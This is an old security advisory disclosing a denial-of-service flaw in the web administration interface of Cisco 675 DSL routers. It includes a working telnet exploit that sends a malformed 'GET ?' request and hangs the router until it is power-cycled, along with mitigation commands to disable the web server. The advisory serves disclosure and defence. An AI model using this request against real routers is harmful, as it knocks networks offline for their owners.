Vulnerability

    Cisco

Affected

    Cisco 675 DSL Router

Description

    CDI  found  following.   The  Cisco  675  DSL routers with the Web
    Administration Interface  enabled can  be crashed  (hard) using  a
    simple GET request.  CBOS  versions 2.0.x through 2.2.x have  been
    found to be vulnerable.  The  new CBOS 2.3.x has not been  tested,
    but there are  no notes in  the 2.3.x changelogs  to indicate that
    they've fixed this problem.  Effected 675s were configured in  PPP
    mode.  The  'Web Administration Interface'  is enabled by  default
    in CBOS revisions 2.0.x and 2.2.x.

    The Cisco 67x series of  DSL routers are produced and  distributed
    for specific  telcos to  offer to  their clients  and as such, the
    installation base  is quite  large. (To  hazzard a  guess, if just
    20% of all Qwest DSL users are using Cisco 675s, the  installation
    base  would  exceed  25,000)  The  DSL  adapters  in  this  series
    include:  Cisco 673, Cisco 675, Cisco 675e, Cisco 676, Cisco  677,
    and Cisco 678.  This advisory applies specifically to the 675  but
    other  adapters  in  this  series  may  have  similar problems and
    should be tested  for vulnerability to  this type of  attack.  The
    CBOS codebase is  an aquired OS  and as such,  has no relationship
    at all to the main Cisco IOS codebase.

    Exploit:

        telnet vic.tim.ip.addr 80
        Connected to vic.tim.ip.addr.
        Escape character is '^]'.
        GET / HTTP/1.0
        HTTP/1.0 401 Unauthorized
        Content-type: text/html
        WWW-Authenticate: Basic realm="CISCO_WEB"

        <CENTER><h1>Unauthorized Access 401</h1></center>
        Connection closed by foreign host.

    Now kill it:

        telnet vic.tim.ip.addr 80
        Trying vic.tim.ip.addr...
        Connected to vic.tim.ip.addr.
        Escape character is '^]'.
        GET ? [LF][LF]

    Your telnet session dies here, and so does the router.

    Dead as a post:

        ping -c5 vic.tim.ip.addr
        PING vic.tim.ip.addr (vic.tim.ip.addr): 56 data bytes
        5 packets transmitted, 0 packets received, 100% packet loss

    The  Cisco  never  recovers  -  it's  hosed  until  the  router is
    power-cycled.  A simple 'GET ?  \n\n' is all it takes to  kill the
    router.   In case  you're wondering,  CDI had  meant to enter 'GET
	/', but his finger slipped on the shift key. Neat eh?

    This exploit works on a Cisco 677 running CBOS 2.2.0.002.  It does
    not  work  when  you  specify  the  web  server  to  only   accept
    connections from certain IP's.  You could spoof them, but have fun
    guessing the IP.

Solution

    Disable the Web Based Administration Interface in your 675 until a
    patch or  CBOS revision  is made  available.   Web Server  Disable
    commands (2.0.x or better):

        (CBOS 'enable' mode) cbos# set web disabled
                             cbos# write
                             cbos# reboot

    For solution see:

        http://oliver.efri.hr/~crv/security/bugs/Others/cisco43.html